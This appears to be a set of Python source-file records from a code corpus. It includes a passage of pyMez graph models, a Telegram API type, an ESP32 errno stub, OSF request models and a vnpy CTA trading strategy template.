defaults={"graph_name":"Two Port Parameter Graph",
"node_names":["SFrequencyList",'SFrequencyMatrixList'],
"node_descriptions":["S Parameters","S Parameters in a Matrix"],
"current_node":'SFrequencyList',
"state":[1,0],
"data":[[1.0,.9,.436,.436,.9]],
"edge_2_to_1":FrequencyMatrixList_to_FrequencyList,
"edge_1_to_2":FrequencyList_to_FrequencyMatrixList,
"frequency_units":"GHz",
"Z01":50,
"Z02":50 }
graph_options={}
for key,value in defaults.items():
graph_options[key]=value
for key,value in options.items():
graph_options[key]=value
Graph.__init__(self,**graph_options)
self.add_node("TFrequencyMatrixList",
"SFrequencyMatrixList",SFrequencyMatrixList_to_TFrequencyMatrixList,
"SFrequencyMatrixList",TFrequencyMatrixList_to_SFrequencyMatrixList,
"T Parameters in a Matrix")
self.add_node("TFrequencyList",
"TFrequencyMatrixList",FrequencyMatrixList_to_FrequencyList,
"TFrequencyMatrixList",FrequencyList_to_FrequencyMatrixList,
"T Parameters")
self.add_node("ZFrequencyList",
"SFrequencyList",SFrequencyList_to_ZFrequencyList,
"TFrequencyList",ZFrequencyList_to_TFrequencyList,
"Z Parameters")
self.add_node("ZFrequencyMatrixList",
"ZFrequencyList",FrequencyList_to_FrequencyMatrixList,
"ZFrequencyList",FrequencyMatrixList_to_FrequencyList,
"Z Parameters in a matrix")
self.add_node("ABCDFrequencyList",
"ZFrequencyList",ZFrequencyList_to_ABCDFrequencyList,
"ZFrequencyList",ABCDFrequencyList_to_ZFrequencyList,
"ABCD Parameters")
self.add_node("ABCDFrequencyMatrixList",
"ABCDFrequencyList",FrequencyList_to_FrequencyMatrixList,
"ABCDFrequencyList",FrequencyMatrixList_to_FrequencyList,
"ABCD Parameters in a matrix")
self.add_node("HFrequencyList",
"ABCDFrequencyList",ABCDFrequencyList_to_HFrequencyList,
"ZFrequencyList",HFrequencyList_to_ZFrequencyList,
"h Parameters")
self.add_node("HFrequencyMatrixList",
"HFrequencyList",FrequencyList_to_FrequencyMatrixList,
"HFrequencyList",FrequencyMatrixList_to_FrequencyList,
"H Parameters in a matrix")
self.add_node("YFrequencyList",
"ABCDFrequencyList",ABCDFrequencyList_to_YFrequencyList,
"HFrequencyList",YFrequencyList_to_HFrequencyList,
"Y Parameters")
self.add_node("YFrequencyMatrixList",
"YFrequencyList",FrequencyList_to_FrequencyMatrixList,
"YFrequencyList",FrequencyMatrixList_to_FrequencyList,
"Y Parameters in a matrix")
self.add_edge(begin_node="ZFrequencyMatrixList",
end_node="YFrequencyMatrixList",
edge_function=ZFrequencyMatrixList_to_YFrequencyMatrixList)
self.add_edge(begin_node="SFrequencyMatrixList",
end_node="ZFrequencyMatrixList",
edge_function=SFrequencyMatrixList_to_ZFrequencyMatrixList)
self.add_edge(begin_node="ZFrequencyMatrixList",
end_node="TFrequencyMatrixList",
edge_function=ZFrequencyMatrixList_to_TFrequencyMatrixList)
self.add_edge(begin_node="ABCDFrequencyList",
end_node="SFrequencyList",
edge_function=ABCDFrequencyList_to_SFrequencyList)
class DataTableGraph(Graph):
""" Class that transforms a row modelled header and metadata to several different data types
#!python
defaults={"graph_name":"Data Table Graph",
"node_names":['DataFrameDictionary','AsciiDataTable'],
"node_descriptions":["Pandas Data Frame Dictionary","AsciiDataTable"],
"current_node":'DataFrameDictionary',
"state":[1,0],
"data":AsciiDataTable_to_DataFrameDictionary(TwoPortRawModel(os.path.join(TESTS_DIRECTORY,'TestFileTwoPortRaw.txt'))),
"edge_2_to_1":AsciiDataTable_to_DataFrameDictionary,
"edge_1_to_2":DataFrameDictionary_to_AsciiDataTable
}
"""
def __init__(self,**options):
defaults={"graph_name":"Data Table Graph",
"node_names":['DataFrameDictionary','AsciiDataTable'],
"node_descriptions":["Pandas Data Frame Dictionary","AsciiDataTable"],
"current_node":'DataFrameDictionary',
"state":[1,0],
"data":AsciiDataTable_to_DataFrameDictionary(TwoPortRawModel(os.path.join(TESTS_DIRECTORY,'TestFileTwoPortRaw.txt'))),
"edge_2_to_1":AsciiDataTable_to_DataFrameDictionary,
"edge_1_to_2":DataFrameDictionary_to_AsciiDataTable
}
graph_options={}
for key,value in defaults.items():
graph_options[key]=value
for key,value in options.items():
graph_options[key]=value
Graph.__init__(self, **graph_options)
self.add_node("ExcelFile", "DataFrameDictionary", DataFrameDictionary_to_ExcelFile,
"DataFrameDictionary", ExcelFile_to_DataFrameDictionary,
node_description="Excel Workbook")
self.add_node("HdfFile", "DataFrameDictionary", DataFrameDictionary_to_HdfFile,
"DataFrameDictionary", HdfFile_to_DataFrameDictionary, node_description="HD5 File")
self.add_node("CsvFile", "AsciiDataTable", AsciiDataTable_to_CsvFile,
"AsciiDataTable", File_to_AsciiDataTable, node_description="CSV File")
self.add_node("HpFile", "AsciiDataTable", AsciiDataTable_to_HpFile,
"AsciiDataTable", File_to_AsciiDataTable, node_description="hp format File")
self.add_external_node(external_node_name="XMLDataTable", jump_into_node_begin="AsciiDataTable",
jump_into_node_function=AsciiDataTable_to_XmlDataTable,
external_node_description="XMLDataTable")
#-----------------------------------------------------------------------------
# Module Scripts
#TODO: Add test_Graph script currently lives in jupyter-notebooks
#-----------------------------------------------------------------------------
# Module Runner
if __name__ == '__main__':
pass | 49.816969 | 136 | 0.603793 | [
"Unlicense"
] | aricsanders/pyMez3 | Code/DataHandlers/GraphModels.py | 52,258 | Python |
from ..utils import Object
class ChatEventAction(Object):
"""
Represents a chat event
No parameters required.
"""
ID = "chatEventAction"
def __init__(self, **kwargs):
pass
@staticmethod
def read(q: dict, *args) -> "ChatEventStickerSetChanged or ChatEventMemberLeft or ChatEventPermissionsChanged or ChatEventMemberJoined or ChatEventTitleChanged or ChatEventSlowModeDelayChanged or ChatEventDescriptionChanged or ChatEventInvitesToggled or ChatEventUsernameChanged or ChatEventMemberPromoted or ChatEventLocationChanged or ChatEventIsAllHistoryAvailableToggled or ChatEventMessagePinned or ChatEventPhotoChanged or ChatEventPollStopped or ChatEventMemberInvited or ChatEventMessageDeleted or ChatEventSignMessagesToggled or ChatEventMessageUnpinned or ChatEventMessageEdited or ChatEventLinkedChatChanged or ChatEventMemberRestricted":
if q.get("@type"):
return Object.read(q)
return ChatEventAction()
| 42.869565 | 653 | 0.792089 | [
"MIT"
] | iTeam-co/pytglib | pytglib/api/types/chat_event_action.py | 986 | Python |
"""
Module: 'uerrno' on esp32 1.12.0
"""
# MCU: (sysname='esp32', nodename='esp32', release='1.12.0', version='v1.12 on 2019-12-20', machine='ESP32 module (spiram) with ESP32')
# Stubber: 1.3.2
EACCES = 13
EADDRINUSE = 98
EAGAIN = 11
EALREADY = 114
EBADF = 9
ECONNABORTED = 103
ECONNREFUSED = 111
ECONNRESET = 104
EEXIST = 17
EHOSTUNREACH = 113
EINPROGRESS = 115
EINVAL = 22
EIO = 5
EISDIR = 21
ENOBUFS = 105
ENODEV = 19
ENOENT = 2
ENOMEM = 12
ENOTCONN = 107
EOPNOTSUPP = 95
EPERM = 1
ETIMEDOUT = 110
errorcode = None
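
# --- Illustrative sketch (editor's addition, not part of the generated stub) ---
# On MicroPython, failed stream/socket operations raise OSError whose first
# argument is one of the errno values above.  A typical helper:
def _would_block(exc):
    """Return True when an OSError simply means 'try again later'."""
    return len(exc.args) > 0 and exc.args[0] in (EAGAIN, EINPROGRESS)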
| 17.862069 | 135 | 0.69112 | [
"MIT"
] | AssimilatedGuy/micropython-stubs | stubs/micropython-esp32-1_12/uerrno.py | 518 | Python |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
from include import IncludeManager
from osf.models.base import BaseModel, ObjectIDMixin
from osf.utils.workflows import RequestTypes
from osf.models.mixins import NodeRequestableMixin, PreprintRequestableMixin
class AbstractRequest(BaseModel, ObjectIDMixin):
class Meta:
abstract = True
objects = IncludeManager()
request_type = models.CharField(max_length=31, choices=RequestTypes.choices())
creator = models.ForeignKey('OSFUser', related_name='submitted_%(class)s', on_delete=models.CASCADE)
comment = models.TextField(null=True, blank=True)
@property
def target(self):
raise NotImplementedError()
class NodeRequest(AbstractRequest, NodeRequestableMixin):
""" Request for Node Access
"""
target = models.ForeignKey('AbstractNode', related_name='requests', on_delete=models.CASCADE)
class PreprintRequest(AbstractRequest, PreprintRequestableMixin):
""" Request for Preprint Withdrawal
"""
target = models.ForeignKey('Preprint', related_name='requests', on_delete=models.CASCADE)
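
# --- Illustrative sketch (editor's addition, not part of the original module) ---
# How a node access request could be created through the Django ORM.  The
# RequestTypes.ACCESS member and the `user`/`node` arguments are assumptions
# made for the example; check osf.utils.workflows for the real choice values.
def _example_create_node_request(user, node, comment=''):
    return NodeRequest.objects.create(
        creator=user,
        target=node,
        comment=comment,
        request_type=RequestTypes.ACCESS.value,
    )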
| 31.135135 | 104 | 0.757813 | [
"Apache-2.0"
] | CenterForOpenScience/osf.io | osf/models/request.py | 1,152 | Python |
""""""
import os
import uuid
import bz2
import pickle
import traceback
import zlib
from abc import ABC
from copy import copy,deepcopy
from typing import Any, Callable
from logging import INFO, ERROR
from datetime import datetime
from vnpy.trader.constant import Interval, Direction, Offset, Status, OrderType, Color, Exchange
from vnpy.trader.object import BarData, TickData, OrderData, TradeData
from vnpy.trader.utility import virtual, append_data, extract_vt_symbol, get_underlying_symbol
from .base import StopOrder, EngineType
from vnpy.component.cta_grid_trade import CtaGrid, CtaGridTrade, LOCK_GRID
from vnpy.component.cta_position import CtaPosition
from vnpy.component.cta_policy import CtaPolicy # noqa
class CtaTemplate(ABC):
"""CTA策略模板"""
author = ""
parameters = []
variables = []
# 保存委托单编号和相关委托单的字典
# key为委托单编号
# value为该合约相关的委托单
active_orders = {}
def __init__(
self,
cta_engine: Any,
strategy_name: str,
vt_symbol: str,
setting: dict,
):
""""""
self.cta_engine = cta_engine
self.strategy_name = strategy_name
self.vt_symbol = vt_symbol
self.inited = False # 是否初始化完毕
self.trading = False # 是否开始交易
self.pos = 0 # 持仓/仓差
self.entrust = 0 # 是否正在委托, 0, 无委托 , 1, 委托方向是LONG, -1, 委托方向是SHORT
self.tick_dict = {} # 记录所有on_tick传入最新tick
self.active_orders = {}
# Copy a new variables list here to avoid duplicate insert when multiple
# strategy instances are created with the same strategy class.
self.variables = copy(self.variables)
self.variables.insert(0, "inited")
self.variables.insert(1, "trading")
self.variables.insert(2, "pos")
self.variables.insert(3, "entrust")
def update_setting(self, setting: dict):
"""
        Update strategy parameters with values in the setting dict.
"""
for name in self.parameters:
if name in setting:
setattr(self, name, setting[name])
@classmethod
def get_class_parameters(cls):
"""
Get default parameters dict of strategy class.
"""
class_parameters = {}
for name in cls.parameters:
class_parameters[name] = getattr(cls, name)
return class_parameters
def get_parameters(self):
"""
Get strategy parameters dict.
"""
strategy_parameters = {}
for name in self.parameters:
strategy_parameters[name] = getattr(self, name)
return strategy_parameters
def get_variables(self):
"""
Get strategy variables dict.
"""
strategy_variables = {}
for name in self.variables:
strategy_variables[name] = getattr(self, name)
return strategy_variables
def get_data(self):
"""
Get strategy data.
"""
strategy_data = {
"strategy_name": self.strategy_name,
"vt_symbol": self.vt_symbol,
"class_name": self.__class__.__name__,
"author": self.author,
"parameters": self.get_parameters(),
"variables": self.get_variables(),
}
return strategy_data
def get_positions(self):
""" 返回持仓数量"""
pos_list = []
if self.pos > 0:
pos_list.append({
"vt_symbol": self.vt_symbol,
"direction": "long",
"volume": self.pos
})
elif self.pos < 0:
pos_list.append({
"vt_symbol": self.vt_symbol,
"direction": "short",
"volume": abs(self.pos)
})
return pos_list
@virtual
def on_timer(self):
pass
@virtual
def on_init(self):
"""
Callback when strategy is inited.
"""
pass
@virtual
def on_start(self):
"""
Callback when strategy is started.
"""
pass
@virtual
def on_stop(self):
"""
Callback when strategy is stopped.
"""
pass
@virtual
def on_tick(self, tick: TickData):
"""
Callback of new tick data update.
"""
pass
@virtual
def on_bar(self, bar: BarData):
"""
Callback of new bar data update.
"""
pass
@virtual
def on_trade(self, trade: TradeData):
"""
Callback of new trade data update.
"""
pass
@virtual
def on_order(self, order: OrderData):
"""
Callback of new order data update.
"""
pass
@virtual
def on_stop_order(self, stop_order: StopOrder):
"""
Callback of stop order update.
"""
pass
def buy(self, price: float, volume: float, stop: bool = False, lock: bool = False,
vt_symbol: str = '', order_type: OrderType = OrderType.LIMIT,
order_time: datetime = None, grid: CtaGrid = None):
"""
Send buy order to open a long position.
"""
if order_type in [OrderType.FAK, OrderType.FOK]:
if self.is_upper_limit(vt_symbol):
self.write_error(u'涨停价不做FAK/FOK委托')
return []
if volume == 0:
self.write_error(f'委托数量有误,必须大于0,{vt_symbol}, price:{price}')
return []
return self.send_order(vt_symbol=vt_symbol,
direction=Direction.LONG,
offset=Offset.OPEN,
price=price,
volume=volume,
stop=stop,
lock=lock,
order_type=order_type,
order_time=order_time,
grid=grid)
def sell(self, price: float, volume: float, stop: bool = False, lock: bool = False,
vt_symbol: str = '', order_type: OrderType = OrderType.LIMIT,
order_time: datetime = None, grid: CtaGrid = None):
"""
Send sell order to close a long position.
"""
if order_type in [OrderType.FAK, OrderType.FOK]:
if self.is_lower_limit(vt_symbol):
self.write_error(u'跌停价不做FAK/FOK sell委托')
return []
if volume == 0:
self.write_error(f'委托数量有误,必须大于0,{vt_symbol}, price:{price}')
return []
return self.send_order(vt_symbol=vt_symbol,
direction=Direction.SHORT,
offset=Offset.CLOSE,
price=price,
volume=volume,
stop=stop,
lock=lock,
order_type=order_type,
order_time=order_time,
grid=grid)
def short(self, price: float, volume: float, stop: bool = False, lock: bool = False,
vt_symbol: str = '', order_type: OrderType = OrderType.LIMIT,
order_time: datetime = None, grid: CtaGrid = None):
"""
Send short order to open as short position.
"""
if order_type in [OrderType.FAK, OrderType.FOK]:
if self.is_lower_limit(vt_symbol):
self.write_error(u'跌停价不做FAK/FOK short委托')
return []
if volume == 0:
self.write_error(f'委托数量有误,必须大于0,{vt_symbol}, price:{price}')
return []
return self.send_order(vt_symbol=vt_symbol,
direction=Direction.SHORT,
offset=Offset.OPEN,
price=price,
volume=volume,
stop=stop,
lock=lock,
order_type=order_type,
order_time=order_time,
grid=grid)
def cover(self, price: float, volume: float, stop: bool = False, lock: bool = False,
vt_symbol: str = '', order_type: OrderType = OrderType.LIMIT,
order_time: datetime = None, grid: CtaGrid = None):
"""
Send cover order to close a short position.
"""
if order_type in [OrderType.FAK, OrderType.FOK]:
if self.is_upper_limit(vt_symbol):
self.write_error(u'涨停价不做FAK/FOK cover委托')
return []
if volume == 0:
self.write_error(f'委托数量有误,必须大于0,{vt_symbol}, price:{price}')
return []
return self.send_order(vt_symbol=vt_symbol,
direction=Direction.LONG,
offset=Offset.CLOSE,
price=price,
volume=volume,
stop=stop,
lock=lock,
order_type=order_type,
order_time=order_time,
grid=grid)
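
    # --- Illustrative sketch (editor's addition, not part of the template) ---
    # A strategy subclass normally drives the four helpers above from
    # on_bar/on_tick, for example:
    #
    #     def on_bar(self, bar: BarData):
    #         if not self.trading:
    #             return
    #         if self.pos == 0 and long_signal:          # long_signal is a placeholder
    #             self.buy(price=bar.close_price, volume=1)
    #         elif self.pos > 0 and exit_signal:         # exit_signal is a placeholder
    #             self.sell(price=bar.close_price, volume=abs(self.pos))
    #
    # buy/sell/short/cover only wrap send_order() with the direction/offset
    # already filled in.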
def send_order(
self,
vt_symbol: str,
direction: Direction,
offset: Offset,
price: float,
volume: float,
stop: bool = False,
lock: bool = False,
order_type: OrderType = OrderType.LIMIT,
order_time: datetime = None,
grid: CtaGrid = None
):
"""
Send a new order.
"""
# 兼容cta_strategy的模板,缺省不指定vt_symbol时,使用策略配置的vt_symbol
if vt_symbol == '':
vt_symbol = self.vt_symbol
if not self.trading:
self.write_log(f'非交易状态')
return []
vt_orderids = self.cta_engine.send_order(
strategy=self,
vt_symbol=vt_symbol,
direction=direction,
offset=offset,
price=price,
volume=volume,
stop=stop,
lock=lock,
order_type=order_type
)
if len(vt_orderids) == 0:
self.write_error(f'{self.strategy_name}调用cta_engine.send_order委托返回失败,vt_symbol:{vt_symbol}')
# f',direction:{direction.value},offset:{offset.value},'
# f'price:{price},volume:{volume},stop:{stop},lock:{lock},'
# f'order_type:{order_type}')
if order_time is None:
order_time = datetime.now()
for vt_orderid in vt_orderids:
d = {
'direction': direction,
'offset': offset,
'vt_symbol': vt_symbol,
'price': price,
'volume': volume,
'order_type': order_type,
'traded': 0,
'order_time': order_time,
'status': Status.SUBMITTING
}
if grid:
d.update({'grid': grid})
grid.order_ids.append(vt_orderid)
self.active_orders.update({vt_orderid: d})
if direction == Direction.LONG:
self.entrust = 1
elif direction == Direction.SHORT:
self.entrust = -1
return vt_orderids
def cancel_order(self, vt_orderid: str):
"""
Cancel an existing order.
"""
if self.trading:
return self.cta_engine.cancel_order(self, vt_orderid)
return False
def cancel_all(self):
"""
Cancel all orders sent by strategy.
"""
if self.trading:
self.cta_engine.cancel_all(self)
def is_upper_limit(self, symbol):
"""是否涨停"""
tick = self.tick_dict.get(symbol, None)
if tick is None or tick.limit_up is None or tick.limit_up == 0:
return False
if tick.bid_price_1 == tick.limit_up:
return True
def is_lower_limit(self, symbol):
"""是否跌停"""
tick = self.tick_dict.get(symbol, None)
if tick is None or tick.limit_down is None or tick.limit_down == 0:
return False
if tick.ask_price_1 == tick.limit_down:
return True
def write_log(self, msg: str, level: int = INFO):
"""
Write a log message.
"""
self.cta_engine.write_log(msg=msg, strategy_name=self.strategy_name, level=level)
def write_error(self, msg: str):
"""write error log message"""
self.write_log(msg=msg, level=ERROR)
def get_engine_type(self):
"""
Return whether the cta_engine is backtesting or live trading.
"""
return self.cta_engine.get_engine_type()
def load_bar(
self,
days: int,
interval: Interval = Interval.MINUTE,
callback: Callable = None,
interval_num: int = 1
):
"""
Load historical bar data for initializing strategy.
"""
if not callback:
callback = self.on_bar
self.cta_engine.load_bar(self.vt_symbol, days, interval, callback, interval_num)
def load_tick(self, days: int):
"""
Load historical tick data for initializing strategy.
"""
self.cta_engine.load_tick(self.vt_symbol, days, self.on_tick)
def put_event(self):
"""
        Put a strategy data event for UI update.
"""
if self.inited:
self.cta_engine.put_strategy_event(self)
def send_email(self, msg):
"""
Send email to default receiver.
"""
if self.inited:
self.cta_engine.send_email(msg, self)
def sync_data(self):
"""
Sync strategy variables value into disk storage.
"""
if self.trading:
self.cta_engine.sync_strategy_data(self)
class CtaSignal(ABC):
""""""
def __init__(self):
""""""
self.signal_pos = 0
@virtual
def on_tick(self, tick: TickData):
"""
Callback of new tick data update.
"""
pass
@virtual
def on_bar(self, bar: BarData):
"""
Callback of new bar data update.
"""
pass
def set_signal_pos(self, pos):
""""""
self.signal_pos = pos
def get_signal_pos(self):
""""""
return self.signal_pos
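
# --- Illustrative sketch (editor's addition, not part of the original module) ---
# A minimal CtaSignal subclass showing the intended pattern: update signal_pos
# from incoming bars and let the owning strategy read it back.  The threshold
# rule is a placeholder, not a recommended signal.
class _ExampleThresholdSignal(CtaSignal):

    def __init__(self, threshold: float = 0.0):
        super().__init__()
        self.threshold = threshold

    def on_bar(self, bar: BarData):
        # Long when the close is above the threshold, flat otherwise.
        self.set_signal_pos(1 if bar.close_price > self.threshold else 0)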
class TargetPosTemplate(CtaTemplate):
""""""
tick_add = 1
last_tick = None
last_bar = None
target_pos = 0
vt_orderids = []
def __init__(self, cta_engine, strategy_name, vt_symbol, setting):
""""""
super(TargetPosTemplate, self).__init__(
cta_engine, strategy_name, vt_symbol, setting
)
self.variables.append("target_pos")
@virtual
def on_tick(self, tick: TickData):
"""
Callback of new tick data update.
"""
self.last_tick = tick
if self.trading:
self.trade()
@virtual
def on_bar(self, bar: BarData):
"""
Callback of new bar data update.
"""
self.last_bar = bar
@virtual
def on_order(self, order: OrderData):
"""
Callback of new order data update.
"""
vt_orderid = order.vt_orderid
if not order.is_active() and vt_orderid in self.vt_orderids:
self.vt_orderids.remove(vt_orderid)
def set_target_pos(self, target_pos):
""""""
self.target_pos = target_pos
self.trade()
def trade(self):
""""""
self.cancel_all()
pos_change = self.target_pos - self.pos
if not pos_change:
return
long_price = 0
short_price = 0
if self.last_tick:
if pos_change > 0:
long_price = self.last_tick.ask_price_1 + self.tick_add
if self.last_tick.limit_up:
long_price = min(long_price, self.last_tick.limit_up)
else:
short_price = self.last_tick.bid_price_1 - self.tick_add
if self.last_tick.limit_down:
short_price = max(short_price, self.last_tick.limit_down)
else:
if pos_change > 0:
long_price = self.last_bar.close_price + self.tick_add
else:
short_price = self.last_bar.close_price - self.tick_add
if self.get_engine_type() == EngineType.BACKTESTING:
if pos_change > 0:
vt_orderids = self.buy(long_price, abs(pos_change))
else:
vt_orderids = self.short(short_price, abs(pos_change))
self.vt_orderids.extend(vt_orderids)
else:
if self.vt_orderids:
return
if pos_change > 0:
if self.pos < 0:
if pos_change < abs(self.pos):
vt_orderids = self.cover(long_price, pos_change)
else:
vt_orderids = self.cover(long_price, abs(self.pos))
else:
vt_orderids = self.buy(long_price, abs(pos_change))
else:
if self.pos > 0:
if abs(pos_change) < self.pos:
vt_orderids = self.sell(short_price, abs(pos_change))
else:
vt_orderids = self.sell(short_price, abs(self.pos))
else:
vt_orderids = self.short(short_price, abs(pos_change))
self.vt_orderids.extend(vt_orderids)
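
    # Worked example (editor's addition): in live trading with pos = -3 and
    # set_target_pos(2), pos_change = +5.  The first pass covers abs(pos) = 3,
    # closing the short leg; once that order leaves vt_orderids, the next
    # trade() call sees pos = 0 and pos_change = +2, so it buys 2 and reaches
    # the target in two steps.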
class CtaProTemplate(CtaTemplate):
"""
增强模板
"""
idx_symbol = None # 指数合约
exchange = Exchange.LOCAL
price_tick = 1 # 商品的最小价格跳动
symbol_size = 10 # 商品得合约乘数
margin_rate = 0.1 # 商品的保证金
# 委托类型
order_type = OrderType.LIMIT
cancel_seconds = 120 # 撤单时间(秒)
# 资金相关
max_invest_rate = 0.1 # 最大仓位(0~1)
max_invest_margin = 0 # 资金上限 0,不限制
max_invest_pos = 0 # 单向头寸数量上限 0,不限制
# 是否回测状态
backtesting = False
# 逻辑过程日志
dist_fieldnames = ['datetime', 'symbol', 'volume', 'price',
'operation', 'signal', 'stop_price', 'target_price',
'long_pos', 'short_pos']
def __init__(self, cta_engine, strategy_name, vt_symbol, setting):
""""""
self.position = None # 仓位组件
self.policy = None # 事务执行组件
self.gt = None # 网格交易组件
self.klines = {} # K线组件字典: kline_name: kline
self.cur_datetime = None # 当前Tick时间
self.cur_mi_tick = None # 最新的主力合约tick( vt_symbol)
self.cur_99_tick = None # 最新得指数合约tick( idx_symbol)
self.cur_mi_price = None # 当前价(主力合约 vt_symbol)
self.cur_99_price = None # 当前价(tick时,根据tick更新,onBar回测时,根据bar.close更新)
self.last_minute = None # 最后的分钟,用于on_tick内每分钟处理的逻辑
super(CtaProTemplate, self).__init__(
cta_engine, strategy_name, vt_symbol, setting
)
# 增加仓位管理模块
self.position = CtaPosition(strategy=self)
# 增加网格持久化模块
self.gt = CtaGridTrade(strategy=self)
# 增加指数合约
if 'idx_symbol' not in self.parameters:
self.parameters.append('idx_symbol')
if 'backtesting' not in self.parameters:
self.parameters.append('backtesting')
def update_setting(self, setting: dict):
"""
        Update strategy parameters with values in the setting dict.
"""
for name in self.parameters:
if name in setting:
setattr(self, name, setting[name])
symbol, self.exchange = extract_vt_symbol(self.vt_symbol)
if self.idx_symbol is None:
self.idx_symbol = get_underlying_symbol(symbol).upper() + '99.' + self.exchange.value
if self.vt_symbol != self.idx_symbol:
self.write_log(f'指数合约:{self.idx_symbol}, 主力合约:{self.vt_symbol}')
self.price_tick = self.cta_engine.get_price_tick(self.vt_symbol)
self.symbol_size = self.cta_engine.get_size(self.vt_symbol)
self.margin_rate = self.cta_engine.get_margin_rate(self.vt_symbol)
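
        # Worked example (editor's addition): with vt_symbol = 'rb2110.SHFE'
        # and no idx_symbol configured, get_underlying_symbol('rb2110') gives
        # 'rb', so idx_symbol becomes 'RB99.SHFE' and both the index and the
        # dominant contract are tracked.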
def sync_data(self):
"""同步更新数据"""
if not self.backtesting:
self.write_log(u'保存k线缓存数据')
self.save_klines_to_cache()
if self.inited and self.trading:
self.write_log(u'保存policy数据')
self.policy.save()
def save_klines_to_cache(self, kline_names: list = []):
"""
保存K线数据到缓存
:param kline_names: 一般为self.klines的keys
:return:
"""
if len(kline_names) == 0:
kline_names = list(self.klines.keys())
# 获取保存路径
save_path = self.cta_engine.get_data_path()
# 保存缓存的文件名
file_name = os.path.abspath(os.path.join(save_path, f'{self.strategy_name}_klines.pkb2'))
with bz2.BZ2File(file_name, 'wb') as f:
klines = {}
for kline_name in kline_names:
kline = self.klines.get(kline_name, None)
# if kline:
# kline.strategy = None
# kline.cb_on_bar = None
klines.update({kline_name: kline})
pickle.dump(klines, f)
def load_klines_from_cache(self, kline_names: list = []):
"""
从缓存加载K线数据
:param kline_names:
:return:
"""
if len(kline_names) == 0:
kline_names = list(self.klines.keys())
save_path = self.cta_engine.get_data_path()
file_name = os.path.abspath(os.path.join(save_path, f'{self.strategy_name}_klines.pkb2'))
try:
last_bar_dt = None
with bz2.BZ2File(file_name, 'rb') as f:
klines = pickle.load(f)
# 逐一恢复K线
for kline_name in kline_names:
# 缓存的k线实例
cache_kline = klines.get(kline_name, None)
# 当前策略实例的K线实例
strategy_kline = self.klines.get(kline_name, None)
if cache_kline and strategy_kline:
# 临时保存当前的回调函数
cb_on_bar = strategy_kline.cb_on_bar
# 缓存实例数据 =》 当前实例数据
strategy_kline.__dict__.update(cache_kline.__dict__)
kline_first_bar_dt = None
kline_last_bar_dt = None
if len(strategy_kline.line_bar) > 0:
kline_first_bar_dt = strategy_kline.line_bar[0].datetime
kline_last_bar_dt = strategy_kline.line_bar[-1].datetime
# 所有K线的最后时间
if last_bar_dt and strategy_kline.cur_datetime:
last_bar_dt = max(last_bar_dt, strategy_kline.cur_datetime)
else:
last_bar_dt = strategy_kline.cur_datetime
# 重新绑定k线策略与on_bar回调函数
strategy_kline.strategy = self
strategy_kline.cb_on_bar = cb_on_bar
self.write_log(f'恢复{kline_name}缓存数据:[{kline_first_bar_dt}] => [{kline_last_bar_dt}], bar结束时间:{last_bar_dt}')
self.write_log(u'加载缓存k线数据完毕')
return last_bar_dt
except Exception as ex:
self.write_error(f'加载缓存K线数据失败:{str(ex)}')
return None
def get_klines_snapshot(self):
"""返回当前klines的切片数据"""
try:
d = {
'strategy': self.strategy_name,
'datetime': datetime.now()}
klines = {}
for kline_name in sorted(self.klines.keys()):
klines.update({kline_name: self.klines.get(kline_name).get_data()})
kline_names = list(klines.keys())
binary_data = zlib.compress(pickle.dumps(klines))
d.update({'kline_names': kline_names, 'klines': binary_data, 'zlib': True})
return d
except Exception as ex:
self.write_error(f'获取klines切片数据失败:{str(ex)}')
return {}
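
    # --- Illustrative sketch (editor's addition, not part of the template) ---
    # A consumer of get_klines_snapshot() can rebuild the kline dict with the
    # standard library only:
    #
    #     snap = strategy.get_klines_snapshot()
    #     if snap.get('zlib'):
    #         klines = pickle.loads(zlib.decompress(snap['klines']))
    #
    # where `strategy` is any instance of this template.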
def init_position(self):
"""
初始化Positin
使用网格的持久化,获取开仓状态的多空单,更新
:return:
"""
self.write_log(u'init_position(),初始化持仓')
pos_symbols = set()
remove_ids = []
if len(self.gt.up_grids) <= 0:
self.position.short_pos = 0
# 加载已开仓的空单数据,网格JSON
short_grids = self.gt.load(direction=Direction.SHORT, open_status_filter=[True])
if len(short_grids) == 0:
self.write_log(u'没有持久化的空单数据')
self.gt.up_grids = []
else:
self.gt.up_grids = short_grids
for sg in short_grids:
if len(sg.order_ids) > 0 or sg.order_status:
self.write_log(f'重置委托状态:{sg.order_status},清除委托单:{sg.order_ids}')
sg.order_status = False
sg.order_ids = []
short_symbol = sg.snapshot.get('mi_symbol', self.vt_symbol)
if sg.traded_volume > 0:
if sg.open_status and sg.volume== sg.traded_volume:
msg = f'{self.strategy_name} {short_symbol}空单持仓{sg.volume},已成交:{sg.traded_volume},不加载'
self.write_log(msg)
self.send_wechat(msg)
remove_ids.append(sg.id)
continue
pos_symbols.add(short_symbol)
self.write_log(u'加载持仓空单[ID:{},vt_symbol:{},价格:{}],[指数:{},价格:{}],数量:{}手'
.format(sg.id, short_symbol, sg.snapshot.get('open_price'),
self.idx_symbol, sg.open_price, sg.volume))
self.position.short_pos -= sg.volume
self.write_log(u'持久化空单,共持仓:{}手'.format(abs(self.position.short_pos)))
if len(remove_ids) > 0:
self.gt.remove_grids_by_ids(direction=Direction.SHORT,ids=remove_ids)
remove_ids = []
if len(self.gt.dn_grids) <= 0:
# 加载已开仓的多数据,网格JSON
self.position.long_pos = 0
long_grids = self.gt.load(direction=Direction.LONG, open_status_filter=[True])
if len(long_grids) == 0:
self.write_log(u'没有持久化的多单数据')
self.gt.dn_grids = []
else:
self.gt.dn_grids = long_grids
for lg in long_grids:
if len(lg.order_ids) > 0 or lg.order_status:
self.write_log(f'重置委托状态:{lg.order_status},清除委托单:{lg.order_ids}')
lg.order_status = False
lg.order_ids = []
# lg.type = self.line.name
long_symbol = lg.snapshot.get('mi_symbol', self.vt_symbol)
if lg.traded_volume > 0:
if lg.open_status and lg.volume == lg.traded_volume:
msg = f'{self.strategy_name} {long_symbol}多单持仓{lg.volume},已成交:{lg.traded_volume},不加载'
self.write_log(msg)
self.send_wechat(msg)
remove_ids.append(lg.id)
continue
pos_symbols.add(long_symbol)
self.write_log(u'加载持仓多单[ID:{},vt_symbol:{},价格:{}],[指数{},价格:{}],数量:{}手'
.format(lg.id, long_symbol, lg.snapshot.get('open_price'),
self.idx_symbol, lg.open_price, lg.volume))
self.position.long_pos += lg.volume
self.write_log(f'持久化多单,共持仓:{self.position.long_pos}手')
if len(remove_ids) > 0:
self.gt.remove_grids_by_ids(direction=Direction.LONG,ids=remove_ids)
self.position.pos = self.position.long_pos + self.position.short_pos
